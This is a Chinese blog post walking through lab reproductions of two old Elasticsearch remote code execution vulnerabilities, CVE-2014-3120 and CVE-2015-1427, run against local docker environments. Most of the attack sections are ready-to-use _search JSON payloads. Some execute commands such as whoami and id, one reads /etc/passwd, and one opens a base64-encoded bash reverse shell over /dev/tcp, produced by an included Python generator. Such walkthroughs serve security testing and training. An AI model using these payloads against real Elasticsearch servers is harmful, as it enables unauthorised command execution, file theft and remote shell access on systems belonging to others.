ElasticSearch漏洞复现

最新推荐文章于 2024-07-03 17:23:43 发布
置顶 最新推荐文章于 2024-07-03 17:23:43 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: 安全测试 文章标签: elasticsearch 安全性测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hapenl/article/details/128540537
版权

目录

ElasticSearch简介

Elasticsearch(以下简称ES)是目前全文搜索引擎的首选。它是一个基于 Lucene 的搜索服务器,提供了一个分布式多用户能力的全文搜索引擎,它同时基于 RESTful Web 接口,可以快速地储存、搜索和分析海量数据。
ES安装部署成功后,默认端口是9200。

ElasticSearch _search API概述

对ES中存储的数据进行查询分析,使用关键字_search。如下

GET /_search    ## 在根目录下检索所有的index
GET /<target>/_search   ## 在指定索引下检索所有文档
GET /<target1>,<target2>/_search   ## 检索指定多个索引下的所有文档
GET /my_*/_search    ## 使用通配符,检索指定多个索引下的所有文档

ES提供查询的两种形式:URI Search和Request Boby Search。

ElasticSearch 漏洞复现

ElasticSearch CVE-2014-3120复现

  • 漏洞描述:
    在ES1.2之前Elasticsearch的默认配置启用动态脚本,这允许远程攻击者通过_search的source参数执行任意MVEL表达式和Java代码。
    MVEL执行命令代码:
    import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next();
  • 启动环境:
    cd CVE-2014-3120
docker-compose up -d
    启动后,通过127.0.0.1:9200就可以访问,截图如下:
    在这里插入图片描述
    对应的浏览器访问结果,如下json:
    {
   	"status" : 200,
   	"name" : "Hardnose",
   	"version" : {
       "number" : "1.1.1", # 版本号是 1.1.1
       "build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
       "build_timestamp" : "2014-04-16T14:27:12Z",
       "build_snapshot" : false,
       "lucene_version" : "4.7"
     },
     "tagline" : "You Know, for Search"
}
  • 漏洞命令注入利用:
    1. 启动burpsuite抓包 burp抓包
    2. 在Repeater中修改报文,通过_search来获取payload的响应结果。此时需要注意,如果库里没有数据的情况下,需要先写入一条数据后,才可以注入成功。
      注入命令执行的payload:
    {
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}
    2.1 注入示例如下:
    2.1.1 没有数据的情况下: 无数据的注入结果
    2.1.2 写入数据,需要用表单提交的方式(Content-Type: application/x-www-form-urlencoded)写入到二级目录(/xxx/xxx)里 写入数据
    2.1.3 再次获取注入结果 注入结果
    3. 文件读取的payload:
    {
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*;import java.io.File; new java.util.Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\A\").next();"
		}
	}
}
    结果为: 文件读取的结果
    4. 反弹shell注入,参考FastJson远程代码执行漏洞基于JNDI反弹shell使用中【反弹shell的准备】
    或通过下面的反弹shell的bash脚本生成代码:
    #!/usr/bin python3
# _*_ coding: UTF-8 _*_
import base64


def reboundShell(shell_code):
	shell = "bash -c {echo," + base64.b64encode(shell_code.encode("utf-8")).decode() + "}|{base64,-d}|{bash,-i}"
	return shell
	

if __name__ == "__main__":
	code = "bash -i >&/dev/tcp/127.0.0.1/9999 0>&1"
	print(reboundShell(code))


结果为:
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}
    反弹Shell的payload:
    {
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}
    结果如下:
    反弹shell结果

ElasticSearch CVE-2015-1427复现

  • 漏洞描述:
    在CVE-2014-3120之后,ES默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。
    在1.4.3之前的1.3.8和1.4.x版本,Elasticsearch中的Groovy脚本引擎,允许远程攻击者绕过沙盒保护机制,并通过精心制作的脚本执行任意shell命令。
    该漏洞存在两种复现方式:1、沙盒绕过;2、Groovy代码执行。
    Java沙盒绕过法:
    java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
    Groovy代码命令执行
    def command='id';def res=command.execute().text;res
  • 启动环境:
    cd CVE-2015-1427
docker-compose up -d
    启动后,通过127.0.0.1:9200就可以访问,响应结果如下:
    HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 337

{
  "status" : 200,
  "name" : "Avalanche",
  "cluster_name" : "elasticsearch",
  "version" : {
  		"number" : "1.4.2",  # es 版本号 1.4.2
  		"build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
  		"build_timestamp" : "2014-12-16T14:11:12Z",
  		"build_snapshot" : false,
  		"lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}
  • 漏洞命令注入利用:
    1. java沙箱绕过payload
    {
	"size":1,
	"script_fields": {
		"command": {
			"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()"
		}
	}
}
    注入结果如下: java沙箱绕过结果
    2. Groovy代码命令执行payload
    {
	 "size":1,
	 "script_fields": {
	 		 "command": {
	 		 		 "script":"def command='whoami';def res=command.execute().text;res"
			}
	}
}
    注入结果如下:Groovy代码执行结果
Hapen_Lu
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ElasticSearch几个漏洞总结
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
Elasticsearch漏洞检测.rar
11-22
Elasticsearch漏洞检测工具,包含Elasticsearch_1.2漏洞利用工具.jar和esExploit (elasticsearch)终极版.jar(Powered By VTI),如有侵权请联系删除。
Elasticsearch漏洞汇总比较全
weixin_50464560的博客
08-23 5363
测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
Windows server系统加固:数据库Elasticsearch未授权访问
最新发布
君逍遥o
07-03 849
加固Windows Server系统中的Elasticsearch以防止未授权访问需要综合考虑多个方面,包括访问控制、安全认证、软件更新、插件管理、监控和日志记录、网络隔离和防火墙设置等。通过实施这些加固措施,可以显著降低Elasticsearch未授权访问的风险,保护数据安全和系统稳定性。请注意,以上措施仅为一般性建议,具体实现时可能需要根据Elasticsearch的版本、部署环境和业务需求进行调整。建议在实施任何加固措施之前,先评估其对现有系统和业务的影响,并制定相应的测试计划。
Elasticsearch未授权访问漏洞
weixin_46411728的博客
07-03 5780
Elasticsearch未授权访问漏洞
Elasticsearch 未授权访问漏洞
龙卷风摧毁停车场
03-08 5764
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
ElasticSearch单机或集群未授权访问漏洞
爱辉弟的博客
12-18 3476
ElasticSearch未授权访问漏洞,使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口,其他的全部拒绝。并在ES节点上设置用户密码
elasticsearch未授权访问 漏洞修复
05-09
Elasticsearch 是一个流行的开源全文搜索引擎,常用于大数据分析和实时数据检索。然而,如果没有正确配置安全设置,它可能会暴露于未授权访问的风险中,这可能导致数据泄露或恶意操作。本文将详细讲解如何修复 ...
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
ElasticSearch 命令执行漏洞(CVE-2014-3120)
EnerY3的博客
12-12 812
Elasticsearch 命令执行漏洞(CVE-2014-3120),它允许攻击者通过发送精心构造的请求到 Elasticsearch 服务器来执行任意操作系统命令。这个漏洞存在于 Elasticsearch 的早期版本中,并且在较新的版本中已经被修复。
ElasticSearch漏洞合集及其POC合集
weixin_46626737的博客
08-21 520
2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)5.Elasticsearch写入webshell漏洞(WooYun-2015-110216)3.ElasticSearch 目录穿越漏洞(CVE-2015-3337)4.ElasticSearch 目录穿越漏洞(CVE-2015-5531)3)漏洞版本:
ElasticSearch 命令执行漏洞(CVE-2014-3120),2024年最新37岁程序员被裁
2401_83974607的博客
04-13 498
由于这是一个历史上的漏洞,如果你现在正在使用的 Elasticsearch 是最新的稳定版本,那么你应该已经不受此漏洞的影响。不过,仍然建议定期更新你的 Elasticsearch 实例以获取最新的安全修复和其他改进。
Elasticsearch 未授权访问漏洞复现
一纸荒芜的博客
10-31 6097
Elasticsearch 未授权访问漏洞
Elasticsearch 漏洞收集总结
sojrs_sec的博客
12-31 7677
一:未授权访问获取敏感信息 /_cat/indices /_plugin/sql/ /_nodes /_search /_search?preety /_status 二:目录遍历漏洞(cve-2015-3337) 安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响 /_cat/plugins:查看所有已安装的插件 一般复现...
漏洞修复 Zookeeper、MySQL、Elasticsearch
yuansheng730的博客
02-13 1653
zookeeper、MySQL、Elasticserch、http 相关漏洞修复
Elasticsearch未授权访问漏洞复现
HEAVEN569的博客
03-12 7668
简述 Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值